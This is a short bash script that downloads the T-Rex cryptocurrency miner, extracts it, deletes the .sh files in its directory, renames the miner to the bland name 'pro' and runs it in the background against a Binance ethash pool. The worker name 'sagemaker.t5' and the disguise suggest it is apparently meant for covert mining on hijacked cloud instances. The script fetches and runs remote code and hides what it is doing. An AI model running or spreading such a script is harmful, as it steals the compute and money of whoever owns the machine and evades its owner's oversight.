#!/bin/bash

wget https://github.com/trexminer/T-Rex/releases/download/0.24.8/t-rex-0.24.8-linux.tar.gz
tar -xvf t-rex-0.24.8-linux.tar.gz
rm *.sh
mv t-rex pro
chmod +x pro
nohup ./pro -a ethash -o stratum+tcp://ethash.poolbinance.com:443 -u sagemaker.t5 -p x > nohup.out
